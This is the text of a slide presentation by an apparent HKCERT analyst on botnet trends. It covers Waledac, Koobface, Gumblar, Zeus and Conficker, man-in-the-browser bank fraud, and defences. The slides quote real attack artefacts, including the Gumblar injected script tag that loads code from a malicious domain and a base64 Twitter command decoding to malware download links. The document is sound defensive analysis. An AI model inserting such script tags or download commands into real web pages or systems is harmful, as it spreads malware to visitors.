Cyber Attack Trend and Botnet S.C. Leung CISSP CISA CBCP Agenda Botnet and Cyber Attack Trends Botnet Attack Trends Commercialization of Cyber Crime Professionalization of Cyber Crimeware Social Engineering always cool Waledac botnet Following the Social Network Services Koobface botnet Delivering via Web attack & Search Engine Gumblar botnet Following the Money Banking Trojans like Zeus botnet Building the Survival Kit Conficker botnet Defending against Botnet Page 2
Botnet (robot Network) = infrastructure of controlled victim computers (bots) Bot Herder Up: Data Down: Command/Update C&C C&C C&C Up: Data Down: Command/Update bot bot bot bot bot bot bot Spam, Malware Phishing victim victim DDoS attack Page 3 1. Commercialization of Cyber Crime
Product and Service Delivery for Profit What do attackers want now? What are their product and services? Products Personal credentials, CCN, SSN, software CD keys Tools to exploit, tools to hide malware Service subscription: spam, phishing, DDoS botnet (76services.com now closed) Page 5 2. Professionalization of Cyber Crimeware
Professionalization of Cyber Crimeware Division of Labour, R&D and Outsourcing Malware development, Botnet optimization Malware good at detection evasion Malware targeting identifying and terminating security software Multi-language support Remote administration support Signing and encryption Botnet is a sign of maturity of the infrastructure for underground economy Service delivery Maintenance Long term control IT Infrastructure Hosting network, web hosting at hacker friendly environment where there is great bandwidth where legislation is lax where user awareness is low Domain - registration, domain hosting where take down procedure is lengthy Page 7 3. Social Engineering always cool Waledac Botnet
Waledac Botnet Spreading by Spam emails employ social engineering extensively contain link to iframe embedded malicious website, tricking user to install the malware Author = Creator of Storm botnet (which overwhelmed the Internet back in 2007) Has sound infrastructure uses Nginx web server uses Double Fast Flux DNS The DNS records are changing all the time The DNS servers are changing all the time Page 9 Waledac Fast-flux Bot hosts can be dynamically assigned in real time Page 10
Waledac theme ecard social engineering follow the talks of the town Page 11 postcard.exe Waledac Themes social engineering follow the talks of the town Terrorist Attack SMS Spy Independence theme on your Day Partner Play Page 12
Waledac Service and Feature Impact open a back door on the compromised computer steal personal information spam contacts in address book turn zombie into web server, web proxy, DNS and spam template relays Major web server service Pharmacy serving malware Page 13 4. Following the Social Network Services
Koobface (koob-face) A worm spreading in Facebook, MySpace, Twitter, Friendster, hi5 & Bebo Spreading Spoof a friend and send a message Hello; You must see it!!! LOL with a URL URL brings user to a fake YouTube site, luring to install a file Flash_update.exe Upon execution, victim is infected. Impact Poison all user search (Google, Ask, Yahoo and Bing) to malicious site Page 15 http://www.f-secure.com/weblog/archives/00001517.html Koobface: Twitter campaign Infected PCs with Koobface sent out Tweets with malicious URL Page 16
A Botnet uses Twitter as Command Channel Bots subscribe to RSS feed to get command A Tweet like this ahr0cdovl2jpdc5ses9snlnuviagahr0cdovl2jpdc5ses8ys 29Ibw== Base64 decode the tweet, we got 2 tiny URLs http://bit.ly/r6stv http://bit.ly/2koho The bit.ly tiny URLs translated to: http://pastebin.com/pastebin.php?dl=m5222dc70 http://paste.debian.net/43529/download/43529 URLs are encoded file. When decoded and unzipped, giving malware files which were found to be poorly detected by VirusTotal as malware Page 17 5. Delivering via Web attack & Search Engine Gumblar Botnet
Gumblar Botnet: Impact Web site is a delivery channel of malware Gumblar steal FTP credentials and upload malware to 3000 legitimate web sites Botnet connect to two domains for download: gumblar.cn / martuz.cn Two Botnets formed: one for web sites and one for infected client PCs Impacts Client PCs: install backdoor in victims computers that connect to C&C steal FTP credentials from the victims computers Man in the browser attack: monitor traffic to and from the browser: Replace Google search results with links pointing to malicious websites Redirect from e-commerce or banking site to phishing web sites Web sites: compromise any websites owned or operated by the victims distribute malware which exploit Acrobat Reader & Flash Player vulnerabilities Page 19 Gumblar Botnet: Obfuscation Web pages injected obfuscated scripts, which vary from site to site, or page to page Malzilla Page 20 <script src=//martus.cn/vid/?id=j></script>
Gumblar Botnet: Detection and Take down Blocking block the two C&C sites: gumblar.cn and martuz.cn Checking (not 100% accurate) http://www.unmaskparasites.com/security-report/ Page 21 6. Following the Money
Botnet targeting Banks What I have seen on a Zeus Botnet C&C Management interface Bot administration features: Screenshot (save to html without image) Fake redirect (redirect to a prepared fake bank webpage) Html inject (hijack the login session and inject new field) : Log the visiting information of each banking site, record the input string (text or post URL) An unknown field (table: yes/no) found with syntax: nn:nnnnnnnn if the value is yes, mostly with comment, the comment logged the a/c information, e.g. transfer limit. Page 23 Fake Redirect login page Page 24 Source: Computer Associate
Man-in-the-Browser Hacker s ideal operation Intercept transaction Change amount and change destination to attacker account and send to the bank Change the display to user as if his transaction was executed Calculate the should be amount and rewrites the remaining total to screen Source: www.cronto.com Page 25 Man in the Browser (MITB) Install software/plugin inside the browser Hooking key OS and web browser APIs and proxying data Advantage No encryption barrier as in proxy SSL Padlock is unaffected for modified content Direct access to Data Freely alter the web page displayed to the customer Freely modify the requests sent back to the bank. Direct interface to web browser & application Can create additional commands (GET/POST/PUT) Extremely stealthy Client hard to detect, since network is not interfered, web address, digital certificates are all correct Bank sees the customer real IP address Faster real time response so can break 2FA Web App MITB : : Winsock Page 26
Limbo 2 - HTML Injection Limbo 2 Trojan kit Some variants inject fake fields into the online banking forms that the browser displays to the user. The additional fields are designed to collect details to help an attacker to impersonate the victim and/or compromise victim's account What is the use of getting the additional info? Source: ThreatExpert Page 27 Inserting transaction (when login) Login Trojan kick up shadow login at the back Shadow Login PIN + OTP Submit PIN + OTP Insert a new window Hacker use OTP2 to authenticate a transaction PIN + OTP2 Submit Not successful. Please retry Page 28
HKMA Circular 2009-07-13 The HKMA noticed that the recent fraudulent technique adopted by fraudsters is believed to involve infecting the customer's personal computer (PC) with Trojan horse programs to hijack the Internet banking login credentials of customers (including one-time passwords for two-factor authentication) during the Internet banking login process. The hijacked login credentials were used by the fraudsters to conduct high-risk Internet banking transactions such as making fund transfer to an unregistered third-party account. Page 29 7. Building the Survival Kit Conficker Botnet
Conficker - Propagation Mechanism Page 31 Source: Cisco 2009 MidYear Report Conficker a model for sustainable botnet Designed to survive in disaster - What if the C&C are taken down? Conficker.B - Domain generation for malware update Active since Nov 2008, generating 250 domains/day in 5 TLDs for update Conficker s natural predator: the Conficker Working Group Alliance of ICANN, domain registries and IT industry worked together to pre-empt Conficker Pre-register domains Redirect traffic to sinkholes to study the behavious Conficker.C improved Starting Apr 1, 2009, generating 50,000 domains/day in 116 TLDs; uses 500 in random (Some are existing domains) making it harder to preempt the domains improved authentication and encryption so you cannot infiltrate into Conficker.C botnet easily uses P2P for update as well peers can update each other with the right authentication Blocks more security vendors web site Page 32
Collaborative Effort Works! Conficker Working Group lead a concerted effort (www.confickerworkinggroup.org) ICANN organized all registries to pre-empt the registration, handle affected domains Researches generated the list of generated domain and affected domains to provide transparency Some worked out an EyeChart for easy detection Security vendors developed detection and removal tools HKIRC, HKCERT, Police and OGCIO Check affected domains in April list for suspicious content Put idle domains in close observation Exchange intelligence on the progress Coordinate with CNCERT/CC on an HK IP address owned by a mainland web hosting provider No infection Conficker.C Conficker.A/B Page 33 Conficker a model for sustainable Botnet Everyone watching the domain generation, but nothing happened there Since Conficker has dual update mechanisms -- domain generation and P2P, it takes the liberty to use any one at any time. Conficker had succeeded to evolve by P2P channel. We still have a long way to close it down. Page 34
Defending against Botnets Enhance Response Conficker Working Group approach works! ICANN and others are collaborating more to speed up the take down. Sharing of intelligence Speed up takedown Preempt future attacks HKCERT Proactive Discovery of malicious site in Hong Kong (with limited resources) Awareness education for service providers: HKCERT organized with OGCIO and HKPF ISP Symposium in May 2009 Cyber Drill: HKCERT organized with OGCIO and HKPF a cyber drill with theme Combating Cyber Crime in July 2009 HKMA & Banks HKMA circular Banks tighten their procedure for high risk transaction and fraud detection Page 36
Defense against Botnet Botnet is malware 3 Baseline Defense is necessary though insufficient Protection from malware Note browsers plugins can be malicious or weakness point Personal Firewall Update patches Server defense Install minimum modules on server. Do not use it to browse Internet Keep patching update Protect from web attacks Application Firewall See SQL Injection Defence Guideline published by HKCERT Page 37 Monitor software patch level and take prompt action Secunia Personal Software Inspector Scan for installed Windows software and their patch level, with threat level Provide link to download available patch or workardound http://secunia.com/vulnerabil ity_scanning/personal/ Page 38
Monitor software update CleanSofts.com Update Notifier scanning for installed Windows software and display list of updates verifying the software against malware (best effort with current AV software only, so it is no better than VirusTotal) http://cleansofts.org/view/update-notifier.html Page 39 Safe Browsers Browsers add anti-malware, anti-phishing features IE, Mozillia, Opera; add Netcraft toolbar if you want Minimize your browser and plug-ins Firefox and Flock browser now incorporate Google safety alert New browser use sandbox approach: Chrome Page 40
Detecting Botnet Next presentation Q & A S.C. Leung ( 梁 兆 昌 ) scleung@hkcert.org
Building up a Botnet Having the Malware to infect user machines Detection evasion advancement Control and update Getting a Channel to Deliver the Malware Spam: Social Engineering Waledac Legitimate Web Server redirecting users to Exploit servers Gumblar Social Network redirecting users to Exploit servers Koobface Exploit servers hosting the malware Exploiting vulnerabilities (Windows, browser, Office, Acrobat Reader, Adobe Flash, etc.) of the victim machine Controlling the victim PCs Botnet Command and Control Centre Providing resilience in case of take down by law enforcement Fast Flux DNS: to make the structure more dynamic Disaster Recovery: find way to recover Conficker Page 43